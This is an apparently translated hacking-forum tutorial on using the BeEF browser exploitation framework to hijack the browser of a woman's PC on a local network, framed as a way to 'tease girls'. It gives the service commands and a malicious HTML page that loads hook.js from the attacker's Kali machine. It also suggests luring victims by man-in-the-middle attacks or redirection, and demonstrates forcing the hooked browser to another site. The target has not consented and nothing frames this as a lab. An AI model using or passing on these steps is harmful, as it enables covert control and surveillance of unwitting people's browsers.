Title: How to tease girls in the Intranet

https://hacker.bz/t/entry/992-title-how-to-tease-girls-in-the-intranet/

Environmental description:

kali linux(192.168.0.114) Heikuidi device win7 (192.168.0.113) Girls' pc

Meet beef

BEEF (The Browser Exploitation Framework): A browser attack framework developed in Ruby language, a module installed by default in Kali, used to implement attacks and exploitation of XSS vulnerabilities.

BeEF mainly inserts a JS script code called hook.js into the web page. If the browser visits a page with hook.js (hook), it will be hooked (hooked). The hooked browser will execute the initial code to return some information. Then the target host will send a request to the BeEF server every once in a while (default is 1 second), asking whether there is new code to be executed. BeEF servers are essentially like web applications, divided into front-end and back-end. The front-end will poll the back-end whether there is new data that needs to be updated. At the same time, the front-end can also send instructions to the back-end. BeEF holders can log in to the back-end of BeEF through the browser to control the front-end (user's browser). BeEF is generally used in conjunction with XSS vulnerabilities. 请输入图片描述

Start BEEF

Method 1: Click the icon in the column to start.

Method 2: Execute the command beef-xss

Kali has already made beef-xss a service, and we can also use the systemctl command to start or close the beef service

systemctl start beef-xss.service #Enable beef service

systemctl stop beef-xss.service #Close beef service

systemctl restart beef-xss.service #Restart beef service 请输入图片描述 Note: The initial configuration requires us to enter our account and password (set it yourself)

After startup is completed, it will automatically jump to the browser's management page. Enter the account number and password we just set and log in to the system. The initial account and password are beef 请输入图片描述

Configure our hooks

There are two methods to briefly talk about here:

Method 1: Find a website containing xss vulnerability and insert js to achieve the attack target.

Method 2: Write a poisonous web page yourself for others to visit. (Internal network + external network)

Here we take Method 2 as the column: write a simple page.

!doctype html

html

head

meta charset='utf-8'

title la la la la la la la la la/title

/head

Body

h1bbskali.cn/h1

script src='http://192.168.0.114:3000/hook.js'/script

/body

/html

In other words, find a way to get others to visit the page I just wrote. You can achieve the target of the attack. There are many methods, such as man-in-the-middle attack, redirection, black page hanging, etc.

Attack Demo

Demo 1 (device online)

When the attack side visits our web page, we can see the online device in the beef console. 请输入图片描述

Device Attack

Click on our device and select the commands tab. We can see that there are many attack modules. 请输入图片描述

Readers may find that there is a small circle logo with color (green, gray, orange, red) in front of each module.

Internally, BeEF can detect which command modules can work in the currently victimized browser and indicate in color:

Green: The command module can run on the target browser, and the user will not feel any abnormalities.

Orange: The command module can run on the target browser, but the user may feel abnormal (such as pop-ups, prompts, jumps, etc.)

Gray: The command module has not been verified for this target, i.e. it is not known whether it can be run.

Red: The command module does not work for this target

Here are a few modules for you. Everyone else entertains themselves!

Let the browser automatically access the specified website

Click Browser--hooked Doman--Redirect Browser Enter our target URL and click Execute to complete the attack. Return to the page I just opened and found that I automatically jumped to the kali forum.

请输入图片描述